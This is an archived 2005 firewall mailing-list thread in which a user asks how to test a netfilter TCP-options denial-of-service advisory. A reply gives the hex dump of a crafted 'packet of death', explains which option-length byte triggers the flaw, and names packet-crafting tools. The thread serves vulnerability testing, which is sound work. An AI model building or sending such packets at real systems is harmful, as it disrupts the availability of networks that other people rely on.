Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Firewalls
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: tcp options denial of services.

from [Forjette, Joe] Network Security [Permanent Link]
Subject: RE: tcp options denial of services.
Date: Fri, 27 May 2005 14:04:14 -0400 

Example of packet-of-death:

0x0000:  4500 0030 1234 4000 ff06 e83f c0a8 0001
0x0010:  c0a8 0002 0400 1000 0000 0064 0000 0064
0x0020:  7000 0fa0 dc6a 0000 0204 05b4 0101 04fd

I believe the final octet in the packet, 0xfd (bin 253) is the key here.
I believe this octet is the length field of the TCP SACK option. This
value needs to be greater than 0x7f (bin 127) to exploit the
vulnerability described in your link.

Should be able to create one of these with a packet generator such as
packETH:

http://packeth.sourceforge.net/

or edit an existing packet with a packet editor such as Netdude:

http://netdude.sourceforge.net/


Joe Forjette
Security Engineer
Crossbeam Systems

-----Original Message-----
From: Jorge Alfredo Garcia [mailto:frederix@gmail.com] 
Sent: Thursday, May 26, 2005 10:50 AM
To: firewalls@securityfocus.com
Subject: tcp options denial of services.

hello list i am trying to test the netfilter security advisory
2004-06-30-2.6-tcpoption.
(http://www.netfilter.org/security/2004-06-30-2.6-tcpoption.html).
I dont know how to generate the "packet of dead" for testing.
Any idea?
Thanx in advance.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: ISA 2004 - professional opinion, v3x
Next by Date:  Re: ISA 2004 - professional opinion, Mircea MITU
Previous by Thread:  tcp options denial of services., Jorge Alfredo Garcia
Next by Thread:  Open Source IPSec VPN windows clients released, christiaan
Indexes:  [Date] [Thread] [Top] [All Lists]